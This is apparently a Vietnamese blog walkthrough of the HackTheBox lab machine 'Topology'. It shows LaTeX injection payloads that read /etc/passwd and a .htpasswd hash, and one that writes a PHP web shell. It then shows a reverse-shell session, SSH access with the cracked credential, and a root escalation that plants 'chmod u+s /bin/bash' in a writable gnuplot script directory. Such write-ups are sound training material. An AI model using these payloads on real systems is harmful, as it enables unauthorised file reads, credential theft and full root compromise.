Topology

byDryu8 2 min read
9

Enumeration

Zenmap:

LaTeX

Kiểm tra website tôi tìm thấy đương link sau: http://latex.topology.htb/equation.php
Tôi thấy rằng mình hoàn toàn có quyền thực thi command latex. LaTeX Injection
\newread\file
\openin\file=/etc/passwd
\read\file to\line
\text{\line}
\closein\file

Gaining access www-data

Tôi tạo một file shell.php với lệnh:
\begin{filecontents}{shell.php}
<?php system($_GET['cmd']); ?>
\end{filecontents}
Sau đó tôi tìm thấy file tôi đã tạo trong:
Từ đây tôi có thể thực thi câu lệnh bất kỳ tới box. Tạo một Reverse Shell và tôi nhận được shell.
PS D:\thehackbox\Machines\Topology> ncat.exe -l 8888
www-data@topology:/var/www/latex/tempfiles$ whoami
whoami
www-data
www-data@topology:/var/www/latex/tempfiles$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@topology:/var/www/latex/tempfiles$

*Update:

Vài ngày trước HTB đã fix lỗi viết file trong equation.php. Đây là bản update của tôi:
Sử dụng tập lệnh:
$\lstinputlisting{/var/www/dev/.htpasswd}$
Tôi nhận được kết quả sau:

Gaining access vdaisley

www-data@topology:/var/www/latex/tempfiles$ cd ../../
cd ../../
www-data@topology:/var/www$ ls
ls
dev  html  latex  stats
www-data@topology:/var/www$ cd dev
cd dev
www-data@topology:/var/www/dev$ ls -la
ls -la
total 40
drwxr-xr-x 2 www-data www-data 4096 Jan 17 12:26 .
drwxr-xr-x 6 root     root     4096 May 19 13:04 ..
-rw-r--r-- 1 www-data www-data  100 Jan 17 12:26 .htaccess
-rw-r--r-- 1 www-data www-data   47 Jan 17 12:26 .htpasswd
-rw-r--r-- 1 www-data www-data 1068 Jan 17 12:26 LICENSE
-rw-r--r-- 1 www-data www-data 7101 Jan 17 12:26 index.html
-rw-r--r-- 1 www-data www-data 1715 Jan 17 12:26 script.js
-rw-r--r-- 1 www-data www-data 5730 Jan 17 12:26 styles.css
www-data@topology:/var/www/dev$ cat .htpasswd
cat .htpasswd
vdaisley:$apr*****************************xTY0
www-data@topology:/var/www/dev$
Tôi đã có user và pass mã hóa, crack nó và tôi có được người dùng vdaisley:
PS D:\thehackbox\Machines\Topology> ssh vdaisley@topology.htb
vdaisley@topology.htb's password:
vdaisley@topology:~$ ls
hi.txt  LinEnum.sh  user.txt
vdaisley@topology:~$

Privilege escalation

Upload pspy và tôi thấy:
Kiểm tra /opt/gnuplot tôi thấy:
vdaisley@topology:~$ cd /opt
vdaisley@topology:/opt$ ls -la
total 12
drwxr-xr-x  3 root root 4096 May 19 13:04 .
drwxr-xr-x 18 root root 4096 May 19 13:04 ..
drwx-wx-wx  2 root root 4096 Jun  6 08:14 gnuplot
Tại đây tôi thấy rằng gnuplot cho phép ghi. Shell Gnuplot
Tạo một file trong gnuplot với nội dung:
system "chmod u+s /bin/bash"
Tôi đã nhận được kết quả trong pspy:

vdaisley@topology:/opt$ /bin/bash -p
bash-5.0# cd /root/
bash-5.0# ls
root.txt
bash-5.0#



4.94 / 169 rates
Dryu8

Dryu8 is just a newbie in pentesting and loves to drink beer. I will be happy if you can donate me with a beer.

9 Comments

Post a Comment
Previous Post Next Post